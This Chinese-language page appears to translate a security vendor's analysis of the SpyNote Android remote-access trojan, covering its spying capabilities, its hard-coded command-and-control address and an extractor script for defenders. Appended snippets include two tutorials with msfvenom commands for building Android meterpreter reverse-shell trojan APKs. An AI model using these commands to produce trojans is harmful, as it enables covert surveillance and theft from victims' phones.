近日,palo alto networks 威脅情報團隊unit42 宣布發現一類新型安卓木馬spynote,該木馬可執行遠端入侵功能,其生成器近日在多個惡意軟體論壇上遭洩露。 spynoted與知名的rat (remote administration tools, rat) 程式omnirat 和 droidjack相類似,令惡意軟體所有者能夠對android裝置實施遠端管理控制。
與其他rat一樣,spynote有如下主要特徵,
無需root訪問許可權
安裝新的apk 並更新惡意軟體
將裝置上的檔案複製到電腦上
瀏覽裝置上全部資訊
監聽裝置來電
獲取裝置上的聯絡人列表
借助裝置麥克風監聽或者錄製音訊
控制裝置攝像頭
獲取imei串號、wi-fi mac位址以及手機運營商資訊
獲取裝置最後乙個gps定位資訊
撥打**
spynote 安裝包要求受害者接受並准許spynote執行諸多操作,包括:編輯文字資訊、讀取聯絡歷史和****、修改或刪除sd卡內容,已有證據顯示spynote將內容上傳至惡意軟體分析** virustotal和koodous。
分析
安裝成功後,spynote便將該應用的圖示從受害者裝置上抹去,這充分表明spynote的生成器應用是用.net開發的。
該應用未做掩飾處理,也不受任何掩飾工具或保護工具的保護。
圖二,反編譯spynote生成器
此外,經過配置,該rat可通過tcp埠2222進行c&c遠端命令與控制(ip位址為141.255.147.193)的通訊,如下圖,
圖三,借助cerbero profiler實現dalvik位元組碼檢視
圖四,spynote開啟套接字鏈結
基於我們已掌握的資訊,現在我們已經了解到該惡意軟體使用硬編碼server_ip 和 server_port values (如圖四所示)來實現套接字鏈結。我們現在可以借助androguard ( 來設計一款c2資訊提取程式,如下圖所示,spynote.c2.py指令碼將這些數值從apk檔案中解析出來,並將其應用於命令列中,如圖五所示。
圖五,提取出的命令與控**務器資訊
結論
安裝第三方應用將會危險重重,這些資源缺少如google play store這樣官方**的監管,而且,即使有詳盡的步驟和演算法來去除那些惡意應用程式,這些應用也並非無懈可擊。旁載入來自於有問題**的應用,會把使用者以及他們使用的移動裝置曝露於各類惡意軟體和資料丟失危險之中。
到現在為止,我們還沒有看到有主動攻擊使用了spynote,但我們擔心網路罪犯會因為spynote的輕鬆易得而開始作惡。現在,palo alto networks autofocus的使用者可使用spynote tag 來對該木馬進行甄別。
***********************************=分割線******************************==
metasploit安卓木馬
僅供學習使用,禁止非法使用 1.生成木馬程式msfvenom p android meterpreter reverse tcp lhost 本機ip lport 本機埠 r 儲存路徑 檔名.apk這裡我們使用了反射型tcp,讓目標主機連線我們,有時攻擊伺服器時這種方法可以很好的繞過防火牆。3.開啟...
Kali之安卓木馬
進入 進入 msfvenom p android meterpreter reverse tcp lhost 伺服器的ip 上面ping伺服器得到的ip lport 34611 上面伺服器的埠號 r root apk.apk34611是設定的埠,顯示這個說明已經生成木馬成功了,如圖 6.啟動msf。...
新型木馬瞄準安卓手機 可盜取簡訊及銀行賬戶資訊
這種相對較新的安卓木馬軟體,通過攔截手機簡訊專門盜取使用者的銀行賬戶資訊。美國移動安全公司zscaler 的研究人員發現,這種木馬經常以名為888.apk的應用安裝包出現,並主要針對中國的安卓手機使用者。該木馬可以嗅探與銀行有關的簡訊,並把簡訊以郵件的形式發給攻擊者。在一起監測到的例子中,郵件發給了...